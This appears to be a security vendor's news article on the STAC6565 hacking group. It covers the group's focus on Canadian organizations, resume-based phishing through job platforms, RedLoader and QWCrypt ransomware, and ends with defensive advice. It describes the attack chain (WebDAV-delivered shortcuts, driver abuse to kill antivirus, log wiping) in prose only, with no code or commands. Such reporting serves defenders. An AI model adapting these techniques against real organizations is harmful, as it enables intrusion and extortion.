STAC6565 Targets Canada: A Growing Cyber Threat
STAC6565 targets Canada in most of its recent attacks. Researchers say the campaign shows a sharp rise in focused cyber operations. Moreover, investigators observed almost 40 incidents between early 2024 and mid-2025.
The group overlaps with an older cluster known as Gold Blade. However, the report notes that this actor now mixes espionage with ransomware. The activity also stretches across multiple countries, although Canada remains the main target.
Shift From Espionage to Ransomware
The group originally relied on phishing to steal business data. However, recent waves show a shift toward ransomware. The attackers now deploy a custom strain called QWCrypt.
They use a tool known as RedLoader to gather system data. It also contacts remote servers and launches scripts to explore internal directories. Therefore, intrusions often escalate quickly.
A Narrow but Intense Geographic Focus
Almost 80% of recent attacks targeted Canadian organizations. Other victims include entities in the U.S., the U.K., and Australia. However, the report highlights that service and manufacturing sectors suffered the most.
The group appears to follow a “hack-for-hire” model. It carries out tailored intrusions for paying clients. Therefore, its campaigns often include both data theft and selective ransomware deployment.
Sophisticated Tactics and Long Rest Cycles
Researchers describe STAC6565 as highly professional. The group refines its tools frequently and uses quiet extortion tactics. However, the report states that it is not linked to any government.
The attackers work in cycles. They pause activity for long periods, then strike with updated tools. Therefore, defenders must anticipate sudden spikes in attacks.
Phishing Through Job Platforms
The attack chain usually begins with spear-phishing. The group sends fake resumes to HR teams. Since late 2024, it has also uploaded malicious documents to popular job platforms.
This method increases the chance of opening the weaponized file. It also bypasses basic email filtering. Therefore, HR staff face elevated risks.
Delivery Chains and Multi-Stage Payloads
A notable attack used a fake resume that redirected victims to a harmful link. The link triggered a RedLoader chain that delivered QWCrypt. Researchers observed several variations of this chain in 2024 and 2025.
One update involved a ZIP archive containing a disguised shortcut file. The shortcut fetched a disguised executable through a WebDAV server. Then RedLoader loaded additional payloads in several stages. Each stage gathered system details and sent data to attacker-controlled servers.
Defense Evasion and System Control
The group also uses advanced evasion tools. One technique abuses a vulnerable driver to disable antivirus services. Furthermore, in some cases, the attackers distributed modified components across servers before launching ransomware.
In successful cases, QWCrypt ran after days of quiet observation. The final script disabled recovery options and wiped logs. Therefore, victims faced major challenges in restoring systems.
Rising Threats Against Hypervisors
Researchers warn that ransomware groups now target hypervisors more often. Attackers deploy payloads directly on these systems to bypass endpoint defenses. As a result, organizations face greater risk across entire virtual environments.
Experts recommend strict access controls and multi-factor authentication. They also advise isolating management networks and auditing administrator actions regularly.
How to Prevent These Attacks
Organizations should train HR staff to detect suspicious documents and avoid opening unknown attachments. They must also monitor servers, user accounts, and external traffic for unusual activity. Additionally, companies can strengthen defenses by adopting continuous threat-monitoring services and automated incident-response systems that detect lateral movement early and block malicious scripts across endpoints.
Sleep well, we got you covered.
